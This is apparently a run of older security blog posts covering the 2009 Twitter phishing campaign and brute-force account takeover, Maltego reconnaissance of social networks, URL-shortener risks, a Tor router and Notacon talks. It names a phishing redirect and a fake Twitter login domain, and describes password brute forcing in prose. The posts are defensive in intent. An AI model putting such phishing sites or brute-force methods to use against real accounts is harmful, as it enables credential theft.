One thing I would add to Lenny’s article is that social media in general is the new “hotness” when it comes to information gathering and reconnaissance. If you are a penetration tester you really need to start leveraging all the information contained in social networks! Better yet, use Maltego which can help search multiple social networks and visually show you this data. You can even hit up the Twitter API with local transforms in the new version of Maltego…yummy!

Twitter photo via Jenny Hayden.

“The court computer system has a small firewall, he said, but the anti-virus on the computer was either non-existent or never upgraded.”

“The IT manager has been trying to bring the city computer systems up to speed. There hasn’t been a system-wide upgrade in years.”

“The employee opened the email because there’s no formal training.”

“One of his goals is to work out a way he can send out software updates, especially anti-virus, to all city computers at night when they aren’t in use.”

I like this one the best…

“The main issue is spending the money for software, licenses and equipment. It’s pretty down-to-earth-basic, he said. “You’ve got to start throwing money around to get it to work.”

Huh? Throw money at the problem…classic. Multiple levels of FAIL right? Oh, if you haven’t figured it out yet…read those quotes again. What would a hacker think about after reading this newspaper article? This court/city computer system is a target rich environment to say the least!

While we could talk all day about how the city could implement a better more cost effective solution to the issues, there are two main problems that I see:

Be careful what you say to the media after an incident
The IT manager gave out way too much information to the media about the problems the city is facing with IT security issues. Just by reading this article someone with bad intentions and a bit of technical skill now knows that the city employs non security aware people and the entire network probably hasn’t been patched in years. This would be even more scary if police and fire computer systems were on the same network! However, the article did point out that police and fire systems are on a separate network. Yet, things don’t look good for the police and fire networks if this same IT manager is running those as well! :-/ Local city government should carefully review all media requests for information about an incident.

Local cities, municipal court systems, fire and police networks are left for dead
This doesn’t surprise me but just like a lot of small businesses, small city governments or suburbs don’t spend the money or have the staff to keep systems patched or up-to-date. Especially in a recession! Your IT guy or contracted support is an easy thing to cut for a city. I would think that most city networks are in worse shape then some home PC networks because of outdated equipment, knowledge and lack of funds. Case in point, I wrote about a potentially dangerous vulnerability that was found on another local city network last year. Luckily this city took the vulnerability seriously, resolved the issue and hopefully improved their security.

Imagine the problems that could happen if police, fire and court systems were breached or compromised. Critical infrastructure like police and fire networks are at serious risk with unsecured systems that are not maintained. As a citizen that lives and works in these cities you should question your local city government about how they maintain and manage their networks. I have an email en route to the mayor of this city that will hopefully help them with some ideas and suggestions to get them back on track. However, I think we may only be scratching the surface of the problem. Lets hope your city takes computer and network security more seriously.

I highly recommend you check out some of the great things that Scott Wright has put together. He has built a security community focused on security awareness for businesses and you may also know Scott as the creator of the Honey Stick Project. Good stuff to check out! I look forward to working with Scott more in the future.

You can check out the Streetwise Security Zone web site and podcast for more information. Definitely another security podcast to add to your play list!

Oh and if that wasn’t enough the pentest entities are now also available locally!

Great work Maltego team! Check out the full announcement here.

What is Maltego if you don’t know about it?
“Maltego is a unique platform developed to deliver a clear threat picture to the environment that an organization owns and operates. Maltego’s unique advantage is to demonstrate the complexity and severity of single points of failure as well as trust relationships that exist currently within the scope of your infrastructure.

The unique perspective that Maltego offers to both network and resource based entities is the aggregation of information posted all over the internet – whether it’s the current configuration of a router poised on the edge of your network or the current whereabouts of your Vice President on his international visits, Maltego can locate, aggregate and visualize this information.”

Read more about Maltego here.

Below is the break down of events with some of my own comments and links to good articles that detail out everything that happened.

#1 Twitter Phishing Attack
I wrote a blog post about this a few days ago. Basically, this is no different then what you see in any other traditional phishing attack except that this is the first time Twitter was targeted on a large scale. Some have even said this was a “worm” because of the way that the phish propagated.

Once a user clicked on the bogus link, entered in their Twitter credentials…their Twitter account was compromised and automatically used to send DM’s (direct messages) to others the compromised user was following. Twitter quickly reacted and worked with blogspot and others to shut down the redirect. However, the web site that hosts the fake Twitter sign-on page is still active and is even being used to phish Facebook users! Why is this not shutdown? Long story but the site is hosted in China and that presents a whole host of issues to get the site taken down. The good news is that if you try to go to the URL in Firefox or Safari the phishing filter kicks in and stops you from going there. I haven’t tested IE 7…and neither should you.

On a side note, I agree that OAuth (or something like FriendFeed’s Remote Key) should be implemented as part of an overall security strategy for Twitter but would not prevent traditional phishing attempts like this from happening (some others share this opinion as well). OAuth is good for authenticating third-party applications (like Twillow or Twitterfeed) that require your Twitter credentials to access your account and do things on your behalf. Lot’s of discussion going on the blogs about this and I’m sure it will continue.

Links that have good information about the Twitter phish: Twitter’s Blog, Naivete: Web 2.0′s biggest security threat and an article over at Twitter Truth

#2 Twitter gets Hacked
This was not related to the phishing incident. Pure weird coincidence that this happened right after users started to figure out what happened with the phishing issue. Ironically, many of us on Twitter (including myself) thought that this was related to phishing after we saw @foxnews get owned but once Britney Spears, Obama and others started showing up with strange tweets many of us knew there was something else going on.

Basically, an 18 year old who wanted to “pen-test Twitter” decided to build a Twitter brute force application that would try common dictionary words against at specific Twitter account. One problem with the current Twitter security model is that there is no lockout policy, meaning, you can try as many failed passwords as you like until you get lucky with the correct password. This guy found one of the accounts used by the Twitter support people (Crystal) and brute forced the password using his tool. Password of “happiness” was found and he was in! There was a password reset feature in the administrative panel that allowed him to reset the password and change the email address of any Twitter account. He didn’t use the accounts himself, rather…he posted that he had access to 33 accounts and gave access to others in a hacker forum that requested the accounts. You can read more about this in the Wired article below as well as see the YouTube video that the hacker put up to prove he did the hack.

Weak Password Brings ‘Happiness’ to Twitter Hacker

How does Twitter get fixed?
Security is always about compromise and with Twitter in particular there has to be a balance between usability and secure features. I was a guest on the SecuraByte podcast the other night talking about the recent Twitter security issues as well as how to secure social media in general. We came to the conclusion that there is no good answer. However, we all agreed that there has to be a mix between technical and non-technical solutions. The technical being better forms of authentication and basic web application security controls (account lockout, email verification..as examples) for starters. On the non-technical side there has to be more basic security education (setting unique hard to guess passwords as an example) focused on the users of social media through lots of different means. There is no good answer to these problems and there are many different opinions but hopefully we can all come to some common ground so we can all make social media more secure for everyone.

Here are a few good links with things that Twitter should consider when re-evaluating the current model:

Ten Security Measures for Social Networking sites – ThreatChaos
Twitter and the Password Anti-Pattern – FactoryCity
The inevitable rise (and fall?) of “twishing” – Jennifer Leggio ZDnet (guest post by Damon Cortesi)

I think we can all agree that Twitter needs to do something soon as the current security model is not sustainable for very much longer.

What are your thoughts on the recent Twitter security issues and social media security in general? How do you think we can we make social media more secure?

You will get a DM (direct message) in your email from a user with the following message:

hey! check out this funny blog about you…
hxxp://jannawalitax.blogspot.com

If you click on blogspot link this is basically a redirect to the following fake Twitter site:

Looks just like an identical copy of the real Twitter site except for the URL! (don’t go to this URL…)

About an hour after this started going around Twitter it looked like Firefox 3 picked up that this was a reported phishing site and you now get the following message:

Looks like Twitter and others moved quickly to get the redirect shut down. If ignore the Firefox warning to the blogspot page you get this:

However, the phishing site is still active and will probably be for awhile. Do not enter in any login credentials at any site other then twitter.com. The fake site in this case is twitter.access-logins.com/login. Note that if you take off the “login” at the end of the URL you are sent to a fake Facebook login page! Looks like these guys have been doing this for quite some time.

One interesting note about this attack…how does someone send you a DM without you following them? There was an interesting hack that is documented here that used to work, however…Twitter fixed this a few months ago. My only guess is that multiple hacked accounts were used to send legitimate DM’s. I’m not 100% sure how DM’s are being propagated in this case but it should be interesting to find out how the attack started in the coming days.

Kudos to the Twitter team and all the Twitter users that retweeted and got to word out. This alone hopefully mitigated much of the threat. I even saw in the Twitter web client that @twitter posted a warning message on the page about the threat. Great work Twitter team!

What if you gave your credentials away to this site?
Change your password immediately! Also, do you use this same password for Facebook, Myspace, email and other sites? Change those as well! Give a password manager like 1password or KeePass (KeePass is free BTW) a try to set unique passwords for every site/application you use. That way if your Twitter account did get compromised, your other accounts are safe. See this post for more information.

There was a good post over at ThreatChaos the other day about a new Firefox extension which will automatically show you the real URL’s of shortened URL’s. What is URL shortening? For example…this long URL:

http://www.google.com/maps?f=q&hl=en&geocode=&q=washington+dc&sll=37.0625,-95.677068&sspn=33.764224,56.25&ie=UTF8&ll=38.905996,-77.023773&spn=0.25915,0.439453&z=11&g=washington+dc&iwloc=addr

becomes…

http://tinyurl.com/9lum95

By using a service like Tinyurl or one of the many other sites available you can easily shorten a URL so your friends don’t freak when you send them long links. When it comes to Twitter it becomes almost mandatory that you shorten that long URL to meet the 140 character limit in your tweets.

What’s the problem?
Getting people to click on a malicious link just got easier with these services. Sure, people will still click on strange URL’s without a mask (even manually typing in strange URL’s as I showed in this post), however, by masking *any* URL with these services a phishing or malware attack can be even more successful.

Also, how can you *easily* see what the real site is behind one of these short URL’s? TinyURL and others offer you a service to “preview” URL’s but many sites don’t offer this and who is actually going to attempt to manually verify what is behind those links? That’s way too much work.

Another problem is that some of these short URL services allow you to obfuscate an already short URL with another short URL. Take for example Xrl.in. The TinyURL above (http://tinyurl.com/9lum95) becomes http://xrl.in/1b0i. This throws off the preview feature of many sites like this. This problem could add multiple redirects and levels of obfuscation to malicious links. All it takes is the right combination of short URL sites.

Right before I was about to post this I saw a post by Jennifer Leggio over at ZDNet regarding the URL redirection issue. She mentions that FriendFeed has implemented a feature that reveals short URL’s if you hover your mouse over the links. This is great…for FriendFeed, what about other more popular social media sites? Check out her article for a good overview of the issue and some interesting information about what other social media sites are doing and not doing about this problem.

The “Long URL Please” Solution
While not 100% perfect this a great start and it looks like the developer is working on improving the Firefox extension and API. You can even use it with other web browsers besides Firefox with a bookmarklet available on his site. Simply click on the bookmarklet and it will transform all the short URL’s on the web page currently loaded.

The Long URL Please Firefox extension will automatically show you the true URL of 30 supported short URL site’s. No hovering over a link or clicking to a site to preview it. It just shows you the link…no extra work on your part. This works great for the Twitter web client as well as any web page that has a link from one of the 30 supported services. One problem I saw was that short URL sites like xrl.in and others will keep popping up (I listed a site above that links 70 of these services). It’s going to take some work from the developer side to keep up with all of these new services. In addition, this doesn’t help with Twitter applications like ones that are Adobe Air based or developed using another type of framework. However, it looks like the developer is working on it and he is trying to get other applications to integrate to his API. Either way, check out this great extension and follow the developer on Twitter to get news on improvements. I look forward to see how this type of extension will evolve.

Short URL’s won’t be going anywhere soon…lets hope social media applications and end users start using them with a little bit security in mind.

What solutions do you think could solve the short URL problem?

Via Hack a day:

“It’s a small two port router. You just plug it in-line between your computer’s switch and your internet connection. It will then anonymize all of your traffic via the Tor network. You can also use it with OpenVPN. The hardware appears to be a Gumstix computer mounted to a daughtercard with two ethernet ports. It will have a web configuration just like a standard router. This looks like a great plug-n-play privacy device.”

Once you buy all the parts you can build your own for about $250. Not too bad for an easy way to anonymize all of your traffic over the Tor network or a VPN. Tor and Privoxy can sometimes be a real pain to configure so something like this would be fantastic to just plug in and configure once. It’s also nice that is can use OpenVPN as well.

My only issue with Tor is that it can be *really* slow for web surfing depending on what relays you connect to and there are some warnings you should be aware of. Also, your Tor installation needs to be updated frequently as the development team is always making updates and improvements. However, Tor is better then nothing if you are concerned with online anonymity.

Kudos to the JanusPA team…looks like I might have a hardware project to work on next year once the instructions get released.

Take for example a recent find called Twellow which is basically a big directory of Twitter users (like the yellow pages). Twellow has some neat features like searching for other Twitter users by keywords and interests. Twellow like many of these types of Twitter applications work by scraping public timelines to populate their site with your information. Twellow asks you to “claim” your profile by putting in your Twitter password. This is where it gets interesting…

To the unsuspecting user it’s tempting to just give your credentials away to every website that asks for it. Twellow is a good looking, legitimate website right? Did you stop to think what could happen to your login credentials? Can you really trust that they don’t record your credentials? The disclaimer says they don’t use your password for anything…you trust everyone right?

What’s your Twitterank?
If you are a heavy Twitter user you may remember the Twitterank fiasco about a month ago. Like many people on Twitter just hearing of a website that will calculate your “rank” on Twitter sounded like a cool idea. No harm in this right? Rumors quickly spread on Twitter and in the blogosphere that Twitterank was a phishing site and that the developer was harvesting Twitter accounts. It ended up that this was most likely a legitimate application…BUT…why do you trust it? Why as social media users do we blatantly trust every Twitter or social media developer out there? No offense to the developer of Twitterank but there are way too many of these sites out there that ask for your account information. A real Twitter phishing site is easy to do using these same tactics. All you need is a legitimate looking website that preys on human weakness…we all want more followers and more rankage, right? For example, if you want to see a spoof Twitter phishing site, check out Twitter Phisher done by the fine folks over at Hak5 (be sure to view source in your browser for some extra lolz).

What’s the fix?
First, social media users need more education. Seriously, don’t just give your credentials away to anyone that asks for it (this actually applies to everything in life). Is your Twitter ranking really that important?

If you did give your credentials away, hopefully you used a different and unique password for that particular account. That way, if your account did get compromised then only one account is compromised, not your entire portfolio of accounts. How do you manage multiple passwords? Give a password manager like 1password or KeePass a try to create and manage unique passwords for each of your social media accounts.

Secondly, social media websites like Twitter need to use better forms of authentication. How about something similar to what FriendFeed is doing by issuing users a “remote key” for all third-party interactions with your account. Of course this isn’t perfect but it’s a step in the right direction. I applaud FriendFeed for having the remote key functionality a required part of the API. BTW, Twitter has been talking about using nifty solutions like OAuth, so do it already @Twitter! HTTP Basic Authentication just doesn’t cut it.

Authentication of user credentials and social media is a big problem…(actually verifying who you say you are is a another topic altogether). What authentication solutions for social media do you think should be adopted?

Time To Replicate The Real Threat: Client Side Penetration Testing
CG & g0ne

Interactivity with Arduinos, Transducing the Physical World
droops & Morgellon the Lowtek Mystic

Fun With The MSP430 MCU
Travis Goodspeed

Hacking Light – How we came to love Holga and Other Stories of photo hi jinx
Jeon & Treize

“Pilates” for Common Cubicle Injuries
Michele Martaus

Super Jason Scott Presentation 64
Jason Scott

Programming The Sega Genesis For Mad Profit and Crazy Mad Profit
SigFLUP

Hacking Cognition
Tottenkoph & Selkie

Intro to Go
Jason Viers

What is Notacon?
Notacon is one of the most unique conferences you will ever attend! Notacon 6 is April 16th – 19th 2009 held in Cleveland, Ohio. Notacon explores and showcases technologies, philosophy and creativity often overlooked at many “hacker cons”. Registration is open!

Features:

* Copy and paste to/from graphs
* Copy and paste to/from text
* Above can also function as “import”
* Zoom to pointer
* Looking glass zoom mode
* Added notch on slider that will return 10,000 entities (if your RAM can stomach it)
* Brought back “Run All Transforms” – you asked for it!
* Cancel transform run (e.g. i clicked on the wrong transform and it’s taking forever while my graph is turning into a green mush, can we please stop this now)
* Easier Mac install

Fixes:

* Authentication proxies now works (including NTLM)
* Cancel on entity export (small annoying fix)
* Transform manager window resizes properly (useful for those on E^3s)
* The dreadful save bug has been fixed (if you never saw it count yourself lucky)

In addition they note the in the upcoming 2.1 version they will be allowing local scriptable transforms! I am really looking forward to this feature as the custom transform creation process will hopefully get a whole lot easier.

Note that the main download page doesn’t have the new package yet so if you want it now you need to get the download links from the forum post here. I would expect the main site updated later today.

Also…the crippled “community edition” is still on the old version for now (updated shortly I am sure). By the way, it’s only $430 USD for the first year, $320 USD per year thereafter for a license of the commercial version…well worth it!

If you plan on attending please RSVP to Devon Campbell (dcampbell2 [aT] mcpc.com).

This event should be a great way to network and meet others in the area! Hope to see some of you locals there!